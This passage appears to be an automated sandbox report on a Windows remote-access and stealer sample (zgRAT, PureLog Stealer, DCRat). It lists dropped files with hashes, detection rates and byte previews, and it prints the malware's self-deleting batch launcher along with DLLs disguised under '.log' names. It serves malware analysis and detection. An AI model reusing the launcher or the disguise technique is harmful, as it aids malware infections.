SHA-256:	034660594B1A78C1512283970BB22B29F6928A253504C49139FF77771DCA6D9D
SHA-512:	F8F780DB19BE48637D05D963D1D5654ED87B7068D6181D7CC379A8550BA3A876CE44C26864165DC3B359AB336D4DD4E3437171B26FD8D2543B438F620D452200
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\ComponentReviewperfmonitor\Mscrt.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\C7dhHeH1wD.bat"

C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Download File

Process:	C:\Users\user\Desktop\wmdqEYgW2i.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4022512
Entropy (8bit):	7.779190537766207
Encrypted:	false
SSDEEP:	98304:y+ALvAvoV3JDBQSBK5f7a6uBt9iofavIa1:tmvvV5DpQ7a6ugoCvIc
MD5:	4680B7118D5D69D9D9ACA7265A07FA8B
SHA1:	47036B3ED3F8AC995680BB6E9D12C91D30D840BE
SHA-256:	98B1A4B0F9D10A1310B30401147CBD7FBB328F03F00C4DD31B99AB6BEDF651FF
SHA-512:	6593078D884DD5EEEFB528C388DFD05F528B03D35B93E47ED73ED27FF35769B6EF5991DD837CB398A44139A35407AB0917BDA82B90A39ED1EECAB2A99CD1F3D7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\m0cl3vlTEp

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	3.9238561897747237
Encrypted:	false
SSDEEP:	3:1TF2WjT8ia0n:ZFjLn
MD5:	818C26F17822D1109420B7252BFD3276
SHA1:	9B73218A4F778D3523A0265731D96EA4A97E7DDD
SHA-256:	7591D7F66CA4E4DCD76834303C264ECA18166F42F16B110490E7A2B79C13BED9
SHA-512:	DDD47FEFAD679CC7A3B6091E14E912B3E0CDDBA5B498ECC8BC24483FC74F775135F24DC80BEB61FDA834BE8163C91971B41BBD889FC57A7A39D72CD385D19E1C
Malicious:	false
Preview:	S76zHSNolFzvYxE6YP4F6nHA6

C:\Users\user\Desktop\AJexuQye.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38400
Entropy (8bit):	5.699005826018714
Encrypted:	false
SSDEEP:	768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:	87765D141228784AE91334BAE25AD743
SHA1:	442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:	9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:	77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ASBxeDSb.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DDhNlQcT.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33280
Entropy (8bit):	5.634433516692816
Encrypted:	false
SSDEEP:	384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:	0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:	4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:	873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:	73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................\|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\DISCORD

Download File

Process:	C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.081427527984575
Encrypted:	false
SSDEEP:	3:XSWHlkHFWKBgdvHvIhN9GIxFf9oQg652UTF/HLMl1m:XSWHlW0aivQLkWFfx/52uyPm
MD5:	B016DAFCA051F817C6BA098C096CB450
SHA1:	4CC74827C4B2ED534613C7764E6121CEB041B459
SHA-256:	B03C8C2D2429E9DBC7920113DEDF6FC09095AB39421EE0CC8819AD412E5D67B9
SHA-512:	D69663E1E81EC33654B87F2DFADDD5383681C8EBF029A559B201D65EB12FA2989FA66C25FA98D58066EAB7B897F0EEF6B7A68FA1A9558482A17DFED7B6076ACA
Malicious:	false
Preview:	{. "args" : {. "code" : "8PgspRYAQu". },. "cmd" : "INVITE_BROWSER",. "nonce" : ".". }

C:\Users\user\Desktop\DXuFwIar.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	6.057993947082715
Encrypted:	false
SSDEEP:	3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
MD5:	16B480082780CC1D8C23FB05468F64E7
SHA1:	6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
SHA-256:	7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
SHA-512:	A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

C:\Users\user\Desktop\DuJNBeJX.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\EvzfQQCl.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FwwvWNOS.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36352
Entropy (8bit):	5.668291349855899
Encrypted:	false
SSDEEP:	384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:	94DA5073CCC14DCF4766DF6781485937
SHA1:	57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:	B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:	7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GSwVnIEh.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GoOOBNnj.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\GtXEsNdN.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	41472
Entropy (8bit):	5.6808219961645605
Encrypted:	false
SSDEEP:	768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
MD5:	6CD78D07F9BD4FECC55CDB392BC5EC89
SHA1:	094DE32070BED60A811D983740509054AD017CE4
SHA-256:	16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
SHA-512:	5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\JInMuEEa.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\KjOuzKdG.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KrxNetEL.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	38912
Entropy (8bit):	5.679286635687991
Encrypted:	false
SSDEEP:	768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
MD5:	9E910782CA3E88B3F87826609A21A54E
SHA1:	8DBC333244620EDA5D3F1C9EAA6B924455262303
SHA-256:	3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
SHA-512:	592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\McddlGOE.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\OUvvQGoW.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	34304
Entropy (8bit):	5.618776214605176
Encrypted:	false
SSDEEP:	768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:	9B25959D6CD6097C0EF36D2496876249
SHA1:	535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:	4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:	C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t\|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PAQlXkJO.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\SDCUsTNK.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\SedCyZmq.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	70144
Entropy (8bit):	5.909536568846014
Encrypted:	false
SSDEEP:	1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
MD5:	E4FA63649F1DBD23DE91861BB39C317D
SHA1:	25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
SHA-256:	CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
SHA-512:	C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TRlucpWH.log

Download File

Process:	C:\ComponentReviewperfmonitor\Mscrt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.010605469502259
Encrypted:	false
SSDEEP:	6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
MD5:	00574FB20124EAFD40DC945EC86CA59C
